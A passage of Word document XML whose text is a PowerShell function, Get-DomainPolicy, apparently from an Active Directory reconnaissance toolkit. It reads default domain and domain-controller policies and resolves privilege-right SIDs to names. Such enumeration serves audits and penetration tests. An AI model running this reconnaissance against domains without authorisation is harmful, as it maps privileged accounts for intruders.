        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77422956" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4038B87C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5B0A4AC8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Get-DomainPolicy {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E3BD6A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE64E6C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615B4093" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="04C94237" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the default domain or DC policy for a given</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FDE04B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        domain or domain controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21926C73" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="09572B08" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Thanks Sean Metacalf (@pyrotek3) for the idea and guidance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701A8EAC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="45E0423D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4759EB69" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5FA8FF66" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Extract Domain or DC (domain controller) policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715AC73D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="429A7189" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0270B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0AAAA4BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to query for default policies, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7E264C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="35900A53" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E8EE63" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="100E3CCF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3F99F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5C020DCA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ResolveSids</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D7EAA7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5751F490" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Resolve Sids from a DC policy to object names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2027BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="32A10E98" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UsePSDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B9B927" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5B010880" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Mount any found policy files with temporary PSDrives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AFEF97" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="65874C92" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12915947" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D1AC345" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-DomainPolicy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C21D09" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4FE0BC8F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the domain policy for the current domain. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAE8F10" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="72B36633" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6764A970" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1BC511B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-DomainPolicy -Source DC -DomainController MASTER.testlab.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72458620" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="703761FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the policy for the MASTER.testlab.local domain controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B774E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740C0F0A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0DA9E607" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EA4387" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2D7998" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9E971B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateSet("Domain","DC")]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1117CD50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $Source ="Domain",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592C3C1F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="110B44BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7858A11B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B298D94" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="042961E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429C92A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB23CE7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4FD71A8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A224248" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ResolveSids,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F557A54" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D42CEDD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3706F922" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UsePSDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21906924" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1E511C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="721A8080" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($Source -eq "Domain") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC0ACD3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # query the given domain for the default domain policy object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B32472" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GPO = Get-NetGPO -Domain $Domain -DomainController $DomainController -GPOname "{31B2F340-016D-11D2-945F-00C04FB984F9}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8A04C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE523B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($GPO) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30975DB9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # grab the GptTmpl.inf file and parse it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F357ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $GptTmplPath = $GPO.gpcfilesyspath + "\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4780F125" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="38AFEE4F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ParseArgs =  @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50562CAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'GptTmplPath' = $GptTmplPath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FD0334" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'UsePSDrive' = $UsePSDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49709C42" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00277CED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="05F047A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            # parse the GptTmpl.inf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF86917" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Get-GptTmpl @ParseArgs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE486C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7312ADA5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2E9C85CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C61B35" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    elseif($Source -eq "DC") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0EA541" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # query the given domain/dc for the default domain controller policy object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E6A91F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GPO = Get-NetGPO -Domain $Domain -DomainController $DomainController -GPOname "{6AC1786C-016F-11D2-945F-00C04FB984F9}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F2E36E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="180BAC49" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($GPO) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DD1E46" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # grab the GptTmpl.inf file and parse it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DF2E48" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $GptTmplPath = $GPO.gpcfilesyspath + "\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FF6B9A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7CCFDEEA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ParseArgs =  @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA7AD65" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'GptTmplPath' = $GptTmplPath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B3D53B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'UsePSDrive' = $UsePSDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72081498" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0AF518" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2E696686" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # parse the GptTmpl.inf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8EDD20" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Get-GptTmpl @ParseArgs | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC5E22D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($ResolveSids) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5582B21C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # if we're resolving sids in PrivilegeRights to names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F7CD3E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Policy = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A897AAB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $_.psobject.properties | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3733E656" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        if( $_.Name -eq 'PrivilegeRights') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D184084" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="066FE88A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $PrivilegeRights = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E38AEC8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                            # for every nested SID member of PrivilegeRights, try to unpack everything and resolve the SIDs as appropriate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F95EE6C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $_.Value.psobject.properties | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E86ED1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="60F009A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $Sids = $_.Value | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AE9784" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF792F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        if($_ -isnot [System.Array]) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CE2337" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                            Convert-SidToName $_ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0629B6C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0955697A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBC32DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                            $_ | ForEach-Object { Convert-SidToName $_ }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF7C49D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3E98B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6274C073" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3407E92C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        Write-Verbose "Error resolving SID : $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E891E51" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5CE164" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3F9C9C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5667D9FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $PrivilegeRights | Add-Member Noteproperty $_.Name $Sids</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6922F6DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D652CFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2D7BC24C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Policy | Add-Member Noteproperty 'PrivilegeRights' $PrivilegeRights</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD9B619" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2BCAC7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510F0B22" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Policy | Add-Member Noteproperty $_.Name $_.Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492B0532" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127333F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689C8A27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586CDFB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CE8E39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                else { $_ }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06330364" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E15CF45" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BD6FE5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
